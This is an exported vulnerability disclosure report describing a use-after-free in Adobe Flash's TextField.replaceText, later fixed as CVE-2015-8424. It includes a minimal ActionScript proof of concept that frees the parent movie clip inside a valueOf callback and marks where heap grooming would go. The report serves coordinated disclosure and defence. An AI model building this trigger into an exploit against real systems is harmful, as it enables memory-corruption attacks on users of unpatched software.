Adobe Flash: Use-after-free in TextField.replaceText

[GoogleCodeExporter]

There is a use-after-free in the TextField.replaceText function. If the 
function is called with a string parameter with toString defined, or an integer 
parameter with valueOf defined, the parent object of the TextField can be used 
after it is freed. Please note that all three parameters of this function are 
susceptible to this issue.

A minimal PoC is as follows:

var times = 0;
var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
tf.replaceText( 1, 2, {valueOf : func});

function func(){

    mc.removeMovieClip();

        // Fix heap here

    return "text";

    }

A sample swf and fla are attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Original issue reported on code.google.com by natashe...@google.com on 14 Oct 2015 at 10:54

Attachments:

• tabIndex.swf
• tabIndex.fla

[GoogleCodeExporter]

PSIRT-4187

Original comment by natashe...@google.com on 17 Dec 2015 at 11:01

• Added labels: CVE-2015-8424
• Removed labels: Restrict-View-Commit

[GoogleCodeExporter]

Original comment by natashe...@google.com on 17 Dec 2015 at 11:01

• Changed state: Fixed